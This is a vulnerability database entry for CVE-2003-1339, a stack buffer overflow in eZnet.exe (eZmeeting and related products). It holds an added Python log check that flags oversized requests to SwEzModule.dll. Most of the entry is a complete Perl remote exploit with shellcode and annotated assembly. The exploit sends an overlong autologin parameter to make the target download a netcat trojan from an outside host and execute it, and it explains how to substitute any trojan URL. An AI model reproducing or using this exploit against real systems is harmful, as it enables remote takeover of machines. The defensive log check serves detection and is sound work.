@EZmeeting EZmeeting EZmeeting Buffer Overflow Vulnerability

Vulnerability ID: 1107596    Vulnerability type: Buffer overflow
Published: 2003-12-15    Updated: 2003-12-31
CVE ID: CVE-2003-1339
CNNVD ID: CNNVD-200312-279
Platform: Windows    CVSS score: 10.0
|Vulnerability sources
https://www.exploit-db.com/exploits/133
https://www.securityfocus.com/bid/78312
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-279
|Vulnerability details
eZnet.exe, as used in eZ (a) eZphotoshare, (b) eZmeeting, (c) eZnetwork, and (d) eZshare, contains a stack-based buffer overflow. A remote attacker can cause a denial of service (crash) or execute arbitrary code via (1) a long GET request, or (2) a long operation or autologin parameter to SwEzModule.dll.
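The detail above gives a defender a concrete pattern to look for in web or proxy logs: requests to SwEzModule.dll whose operation or autologin parameter, or whose whole request target, is far longer than a login would ever need. The following Python check is an added example written for this record; it is not part of the vulnerability entry or of the published exploit. It assumes common-log-format access log lines, and the two thresholds (256 bytes per watched parameter, 2048 bytes per request target) are illustrative assumptions rather than values taken from the advisory.

```python
"""Log check for the eZnet.exe overflow pattern described above.

Added example, not part of this vulnerability record or of the published
exploit. It assumes common-log-format access log lines and uses two
illustrative thresholds (assumptions, not values from the advisory):
a 256-byte limit on the operation/autologin parameter values and a
2048-byte limit on the whole request target.
"""
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed thresholds: far above any legitimate login parameter, far below the
# multi-kilobyte padding an overflow of this kind needs.
MAX_PARAM_LEN = 256
MAX_TARGET_LEN = 2048
WATCHED_PARAMS = ("operation", "autologin")
TARGET_PATH = "/swezmodule.dll"

# Minimal common-log-format pattern: client, identity, user, [timestamp],
# "METHOD request-target HTTP/x.y", status, size.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def analyze_request_target(target):
    """Return the reasons a request target matches the overflow pattern
    (empty list when it does not)."""
    reasons = []
    parts = urlsplit(target)
    if not parts.path.lower().endswith(TARGET_PATH):
        return reasons
    if len(target) > MAX_TARGET_LEN:
        reasons.append("request target is %d bytes (limit %d)"
                       % (len(target), MAX_TARGET_LEN))
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in WATCHED_PARAMS and len(value) > MAX_PARAM_LEN:
            reasons.append("%s value is %d bytes (limit %d)"
                           % (name, len(value), MAX_PARAM_LEN))
    return reasons


def scan_log(lines):
    """Run the check over log lines; return one finding per suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:          # not a request line we understand; skip it
            continue
        reasons = analyze_request_target(m.group("target"))
        if reasons:
            findings.append({
                "client": m.group("client"),
                "timestamp": m.group("ts"),
                "status": m.group("status"),
                "reasons": reasons,
            })
    return findings


# Constructed sample log lines: one normal login, one oversized autologin
# value after which the service returned an error, one unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Dec/2003:10:00:01 +0000] '
    '"GET /SwEzModule.dll?operation=login&autologin=alice HTTP/1.0" 200 512',
    '10.0.0.9 - - [15/Dec/2003:10:00:07 +0000] '
    '"GET /SwEzModule.dll?operation=login&autologin=' + "A" * 3000
    + ' HTTP/1.0" 500 0',
    '10.0.0.9 - - [15/Dec/2003:10:00:09 +0000] '
    '"GET /index.html HTTP/1.0" 200 1024',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["timestamp"], finding["client"], finding["status"],
              "; ".join(finding["reasons"]))
```

Both checks are deliberately applied only to the vulnerable module's path, so ordinary long URLs elsewhere on the host do not raise noise; a match on the second sample line reports both the oversized autologin value and the oversized request target, and a following 500 status on the same request is a useful corroborating signal that the service crashed.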
|Exploit (EXP)
#!/usr/bin/perl -w
# 
# Stack Overflow in eZnet.exe - Remote Exploit
# 
# Will download a trojan from any address which you provide
# on the target system, then will execute the trojan.
# 
# For this exploit I have tried several strategies to increase
# reliability and performance:
# 
# + Jump to a static 'call esp'
# + Backwards jump to code a known distance from the stack pointer
#    since the stack address seems to change for each version of
#    eznet.
# + Works out the byte difference for custom urls
#    (must be no longer than 254 bytes!!)
# + Causes eznet.exe to restart (not really my choice ;o)
# + Shellcode steals addresses from a static module.
# 
# (Shellcode is attached to the bottom of this file!)
#
# - by Peter Winter-Smith [[email protected]]

use IO::Socket;

if(!($ARGV[1]))
{
print "\nUsage: eZnetexploit.pl <victim> <url of trojan>\n" .
      " + netcat trojan at http://www.elitehaven.net/ncat.exe\n" .
      " + listens on port 9999.\n\n";
exit;
}

print "eZnet.exe remote trojan downloader exploit\n";

$victim = IO::Socket::INET->new(Proto=>'tcp',
                               PeerAddr=>$ARGV[0],
                               PeerPort=>"80")
                           or die "Unable to connect to $ARGV[0] on port 80";

$tlen = chr(length($ARGV[1]) + 1);

$shellcode =            "\xEB\x3C\x5F\x55\x89\xE5\x81\xC4" .
                        "\xE8\xFF\xFF\xFF\x57\x31\xDB\xB3" .
                        "\x07\xB0\xFF\xFC\xF2\xAE\xFE\x47" .
                        "\xFF\xFE\xCB\x80\xFB\x01\x75\xF4" .
                        "\x5F\x57\x8D\x7F\x0B\x57\x8D\x7F" .
                        "\x13\x57\x8D\x7F\x08\x57\x8D\x7F" .
                        $tlen .
                        "\x57\x8D\x7F\x09\x47\x57\x8D" .
                        "\x54\x24\x14\x52\xEB\x02\xEB\x52" .
                        "\x89\xD6\xFF\x36\xFF\x15\x1C\x91" .
                        "\x04\x10\x5A\x52\x8D\x72\xFC\xFF" .
                        "\x36\x50\xFF\x15\xCC\x90\x04\x10" .
                        "\x5A\x52\x31\xC9\x51\x51\x8D\x72" .
                        "\xF0\xFF\x36\x8D\x72\xF4\xFF\x36" .
                        "\x51\xFF\xD0\x5A\x52\xFF\x72\xEC" .
                        "\xFF\x15\x1C\x91\x04\x10\x5A\x52" .
                        "\x8D\x72\xF8\xFF\x36\x50\xFF\x15" .
                        "\xCC\x90\x04\x10\x5A\x52\x31\xC9" .
                        "\x41\x51\x8D\x72\xF0\xFF\x36\xFF" .
                        "\xD0\xCC\xE8\x6B\xFF\xFF\xFF\x55" .
                        "\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C" .
                        "\x4C\xFF\x55\x52\x4C\x44\x6F\x77" .
                        "\x6E\x6C\x6F\x61\x64\x54\x6F\x46" .
                        "\x69\x6C\x65\x41\xFF\x57\x69\x6E" .
                        "\x45\x78\x65\x63\xFF" . $ARGV[1] .
                        "\xFF" .
                        "\x63\x3A\x5C\x6E\x63\x2E\x65\x78" .
                        "\x65\xFF\x6B\x65\x72\x6E\x65\x6C" .
                        "\x33\x32\x2E\x64\x6C\x6C\xFF";

$jmpcode =              "\x89\xE0\x66\x2D\x38\x32\xFF\xE0";

$eip = "\xBB\x33\x05\x10";

$packet = "" .
  "GET /SwEzModule.dll?operation=login&autologin=" .
  "\x90"x65 . $shellcode . "a"x(4375 - length($ARGV[1])) . $eip . "\x90"x20 . $jmpcode .
  "\x20HTTP/1.0.User-Agent: SoftwaxAsys/2.1.10\n\n";
                  
print $victim $packet;

print " + Making Request ...\n + Trojan should download - best of luck!\n";

sleep(4);
close($victim);

print "Done.\n";
exit;

#-----------------------------[vampiric.asm]------------------------------
# ; 'eZnet.exe' (eZmeeting, eZnetwork, eZphotoshare, eZshare, eZ)
# ;   (cryptso.dll vampiric shellcode)
# ; Url Download + Execute
# ; By Peter Winter-Smith
# ; [[email protected]]
# 
# bits 32
# 
# jmp short killnull
# 
# next:
# pop edi
# 
# push ebp
# mov ebp, esp
# add esp, -24
# 
# push edi
# 
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
# 
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
# 
# pop edi
# 
# push edi		; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi		; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi		; 'WinExec'
# lea edi, [edi+08]
# push edi		; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi		; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi		; 'kernel32.dll'
# 
# lea edx, [esp+20]
# push edx
# 
# jmp short over
# killnull:
# jmp short data
# over:
# 
# mov esi, edx
# push dword [esi]
# 
# call [1004911ch]	; LoadLibraryA
# 
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
# 
# push eax
# 
# call [100490cch]	; GetProcAddress("URLMON.DLL", URLDownloadToFileA);
# 
# pop edx
# push edx
# 
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16]	; file path
# push dword [esi]
# lea esi, [edx-12]	; url
# push dword [esi]
# push ecx
# 
# call eax
# 
# pop edx
# push edx
# 
# push dword [edx-20]
# 
# call [1004911ch]	; LoadLibraryA
# 
# pop edx
# push edx
# 
# 
# lea esi, [edx-08]
# push dword [esi]	; 'WinExec'
# push eax		; kernel32.dll handle
# 
# call [100490cch]	; GetProcAddress("kernel32.dll", WinExec);
# 
# pop edx
# push edx
# 
# xor ecx, ecx
# inc ecx
# push ecx
# 
# lea esi, [edx-16]	; file path
# push dword [esi]
# 
# call eax
# 
# int3
# 
# ta:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
# ; When altering, you MUST be sure
# ; to also alter the offsets in the 0ffh to null
# ; byte search!
# ; for example:
# ;   db 'http://www.site.com/someguy/trojan.exe',0ffh
# ; count the length of the url, and add one for the 0ffh byte.
# ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
# ; find the code saying (at the start of the shellcode):
# ;   push edi		; 'http://www.elitehaven.net/ncat.exe'
# ;   lea edi, [edi+35]
# ; and make it:
# ;   push edi		; 'http://www.site.com/someguy/trojan.exe'
# ;   lea edi, [edi+39]
# ; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
#-------------------------------------------------------------------------

#------------------------------[subcode.asm]------------------------------
# ; eZnet.exe Sub-Shellcode
# ; [[email protected]]
# 
# ;100533BBh
# 
# bits 32
# 
# mov eax, esp
# sub ax, 3238h
# jmp eax
#-----------------------------------------------




# milw0rm.com [2003-12-15]
|Affected products
Ezmeeting Ezmeeting 3.5

Ezmeeting Ezmeeting 3.4

Ezmeeting Ezmeeting 3.3

|References

Source: MILW0RM
Name: 133
Link: http://www.milw0rm.com/exploits/133
Source: www.governmentsecurity.org
Link: http://www.governmentsecurity.org/archive/t5390.html
Source: SECTRACK
Name: 1008412
Link: http://securitytracker.com/id?1008412
Source: BUGTRAQ
Name: 20031211 eZ and eZphotoshare fixes
Link: http://seclists.org/bugtraq/2003/Dec/0195.html
Source: BUGTRAQ
Name: 20031207 eZ Multiple Packages Stack Overflow Vulnerability
Link: http://marc.info/?l=bugtraq&m=107090390002654&w=2
